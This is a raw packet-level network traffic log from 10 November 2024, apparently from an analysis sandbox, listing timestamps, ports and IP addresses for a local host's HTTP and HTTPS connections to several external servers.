Nov 10, 2024 04:55:23.011076927 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.011079073 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011090040 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011102915 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011121988 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.011121988 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.011147976 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.011208057 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011249065 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.011317968 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011346102 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011358023 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011365891 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.011368036 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011380911 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011392117 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011404037 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.011404037 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.011406898 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011418104 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011431932 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011454105 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.011455059 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.011495113 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.011673927 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011684895 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011709929 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011723042 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011734962 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011753082 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.011753082 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.011773109 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.011941910 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011953115 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011962891 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.011995077 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012002945 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012010098 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012021065 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012034893 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012034893 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012038946 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012053967 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012067080 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012068033 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012080908 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012084961 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012093067 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012106895 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012113094 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012144089 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012144089 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012253046 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012281895 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012293100 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012331009 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012350082 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012351036 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012361050 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012386084 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012397051 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012408972 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012408972 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012420893 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012423992 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012433052 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012470961 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012486935 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012497902 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012509108 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012520075 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012533903 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012551069 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012559891 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012571096 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012579918 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012597084 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012600899 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012609959 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012613058 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012625933 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012638092 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012650967 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012661934 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012661934 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012674093 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012676954 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012689114 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012700081 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.012717009 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012717009 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.012753010 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.013231993 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013298988 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.013329983 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013339996 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013350964 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013382912 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013385057 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.013396025 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013406038 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.013406992 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013417959 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013443947 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.013448954 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013463974 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013467073 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.013475895 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013488054 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013494015 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.013499975 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013506889 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013511896 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.013519049 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.013520956 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013551950 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013565063 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013570070 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.013570070 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.013576031 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013586998 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013600111 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013612986 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013622046 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.013624907 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013637066 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.013638973 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013653994 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.013665915 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.013675928 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.013725996 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.014230013 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.014251947 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.014266014 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.014275074 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.014277935 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.014293909 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.014292002 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.014306068 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.014327049 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.014327049 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.037029982 CET	443	49818	23.221.22.207	192.168.2.5
Nov 10, 2024 04:55:23.037269115 CET	49818	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:23.037282944 CET	443	49818	23.221.22.207	192.168.2.5
Nov 10, 2024 04:55:23.038155079 CET	443	49818	23.221.22.207	192.168.2.5
Nov 10, 2024 04:55:23.038235903 CET	49818	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:23.039388895 CET	49818	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:23.039441109 CET	443	49818	23.221.22.207	192.168.2.5
Nov 10, 2024 04:55:23.041050911 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.041129112 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.041168928 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.041179895 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.041191101 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.041205883 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.041208029 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.041219950 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.041249037 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.041280985 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.044323921 CET	443	49816	23.221.22.207	192.168.2.5
Nov 10, 2024 04:55:23.044539928 CET	49816	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:23.044549942 CET	443	49816	23.221.22.207	192.168.2.5
Nov 10, 2024 04:55:23.044878960 CET	443	49816	23.221.22.207	192.168.2.5
Nov 10, 2024 04:55:23.045159101 CET	49816	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:23.045222044 CET	443	49816	23.221.22.207	192.168.2.5
Nov 10, 2024 04:55:23.055023909 CET	443	49817	23.221.22.207	192.168.2.5
Nov 10, 2024 04:55:23.055249929 CET	49817	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:23.055258036 CET	443	49817	23.221.22.207	192.168.2.5
Nov 10, 2024 04:55:23.055543900 CET	443	49817	23.221.22.207	192.168.2.5
Nov 10, 2024 04:55:23.055917025 CET	49817	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:23.055967093 CET	443	49817	23.221.22.207	192.168.2.5
Nov 10, 2024 04:55:23.063332081 CET	443	49812	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.063389063 CET	49812	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.070591927 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.082035065 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.082055092 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.082081079 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.082098961 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.082120895 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.082132101 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.082146883 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.082166910 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.082215071 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.086622953 CET	443	49812	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.086642027 CET	443	49812	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.086657047 CET	443	49812	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.086698055 CET	49812	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.086704969 CET	443	49812	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.086760998 CET	49812	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.089592934 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.089613914 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.089622021 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.089658022 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.089668989 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.089678049 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.089684963 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.089690924 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.089719057 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.089761972 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.091289997 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.091298103 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.091345072 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.091355085 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.091358900 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.091372013 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.091392040 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.114136934 CET	443	49812	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.114155054 CET	443	49812	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.114197969 CET	49812	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.114203930 CET	443	49812	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.114229918 CET	49812	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.114249945 CET	49812	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.114841938 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.114862919 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.114871025 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.114895105 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.114913940 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.114926100 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.114933014 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.114957094 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.114960909 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.114981890 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.115011930 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.122298956 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122324944 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122376919 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122437000 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122447014 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122457027 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122476101 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122494936 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122515917 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122523069 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122523069 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122535944 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122554064 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122566938 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122566938 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122566938 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122591972 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122598886 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122598886 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122606039 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122647047 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122647047 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122730017 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122742891 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122754097 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122776985 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122790098 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122801065 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122802019 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122818947 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122843027 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122843027 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122843027 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122862101 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122874975 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122881889 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122881889 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122886896 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122900009 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122905016 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122915983 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122917891 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122929096 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122956038 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122956038 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.122966051 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122977018 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.122986078 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.123018026 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.123018026 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.123069048 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.123109102 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.123110056 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.123146057 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.123891115 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.123902082 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.123927116 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.123934984 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.123940945 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.123955965 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.123965025 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.123979092 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.124006987 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.124905109 CET	443	49815	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.126616955 CET	49815	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.126635075 CET	443	49815	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.128279924 CET	49815	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.128287077 CET	443	49815	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.163033009 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163052082 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163064003 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163089037 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163108110 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163126945 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163129091 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163129091 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163156033 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163172960 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163173914 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163187027 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163201094 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163212061 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163218975 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163220882 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163249969 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163258076 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163263083 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163273096 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163290024 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163290977 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163347006 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163358927 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163376093 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163386106 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163398981 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163408995 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163464069 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163502932 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163520098 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163537979 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163537979 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163537979 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163537979 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163537979 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163537979 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163537979 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163551092 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163556099 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163578987 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163592100 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163598061 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163608074 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163618088 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163620949 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163640976 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163645983 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163654089 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163665056 CET	80	49771	185.215.113.206	192.168.2.5
